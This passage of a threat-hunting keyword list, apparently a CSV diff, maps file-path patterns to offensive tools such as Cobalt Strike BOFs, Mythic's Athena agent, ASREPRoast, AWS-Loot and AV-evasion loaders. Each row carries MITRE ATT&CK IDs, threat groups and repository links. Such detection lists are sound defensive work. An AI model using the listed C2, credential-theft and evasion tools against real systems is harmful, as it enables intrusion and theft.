and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" +"*/ASRenum-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. 
and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" +"*/ASREPRoast*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. 
","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" +"*/asreproast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/ASREProastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/assets/bin2uuids_file.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/asyncssh_server.py*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*/atexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/Athena-*.zip*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.csproj*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.exe*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.Profiles.*.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.Profiles.*.exe*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.Profiles.*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.sln*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena/Assembly/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena/Commands/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/athena/mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/athena_utils/*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AthenaPlugins/bin/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AthenaSMB/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AthenaTests/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AtlasReaper.git*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*/AtomLdr.git*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" +"*/attackercan/*","offensive_tool_keyword","Github Username","github Penetration tester repo hosting malicious code","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/attackercan/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*/attacks/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*/AttackServers/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z"
+"*/AttackSurfaceMapper.git*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*/Augustus.git*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" +"*/auth/cc2_auth.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*/auth-owners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/auth-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/autobloody.git*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*/autobloody/archive*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*/AutoBypass.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*/AutoSmuggle.git*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" 
+"*/autotimeliner*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" +"*/auxiliary/scanner/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/avet.git*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*/avet_fabric.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/avet_script_config.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*/avoid_badchars.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*/avred.git*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/avred.py*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file 
are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/avred.py*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*/avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/awesome-burp-extensions/*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*/awesome-pentest*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*/aws__enum_account*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/aws__enum_account/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/AWS-Loot*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. 
This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" +"*/Azure-AccessPermissions.git*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*/AzureC2Relay*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*/AzureHound.ps1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - 